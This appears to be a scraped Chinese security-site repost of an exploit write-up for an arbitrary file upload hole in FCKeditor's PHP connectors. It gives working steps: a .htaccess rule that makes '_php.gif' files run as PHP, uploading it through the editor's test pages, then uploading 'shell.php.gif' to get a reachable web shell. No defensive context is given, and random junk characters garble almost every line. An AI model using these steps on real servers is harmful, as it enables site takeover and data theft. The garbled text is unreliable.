FCKeditor所有php版本Upload上传漏洞
2 B3 V+ y3 N( A7 L: W$ {作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
& P# v- [' T5 T3 t W减小字体 增大字体; t! S4 r2 G, z) m) z. W) u- o
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
2 Z2 s( h- R+ S2 w& ?8 i, h[+] Date: 20116 d) J8 v" H& I. g! I4 ~" W
[+] Author : sinesafe.cn- D- S# N5 V7 k1 W, X5 t* w
[+] Website : WwW.sinesafe.cn! r- j# Y. @9 \% v: A+ L7 e) D
———————————————————9 T1 q1 J. O3 S
1.create a htaccess file:
0 P8 R j0 [# t# U2 p5 N! d9 h1 `code:
2 R N/ B e/ Z! F<FilesMatch “_php.gif”>' k5 o/ p, m4 p
SetHandler application/x-httpd-php
D( u& E& l4 j1 U+ [# R</FilesMatch>+ D V. H; L1 y- d$ z% M
0 L& e5 g8 P6 Y, B4 i
2.Now upload this htaccess with FCKeditor.# f) T6 H$ F3 ?* L
2 C5 e1 |" g4 F% J6 q$ Lhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html$ a( B1 ]/ b Q; \' G) e2 o! [
7 j' c, V, E; U9 G" w
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html, w) M+ s$ \7 ]( m! ^
- B; i1 c* m8 a E3 o
———————————————————————————————-, p4 K$ d& ~) h) h
3.Now upload shell.php.gif with FCKeditor.
5 }% U- D) H4 }9 `. V/ @4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.6 j5 E- ?& y5 l! p" z. u
5.http://www.sinesafe.cn/anything/shell_php.gif
1 A: {% L6 p, d1 v1 W6.Now shell is available from server. | / I( N3 `/ r) x/ L
# z" B) Y: C7 l
! \4 N0 m9 H! x: ~9 _3 N5 O |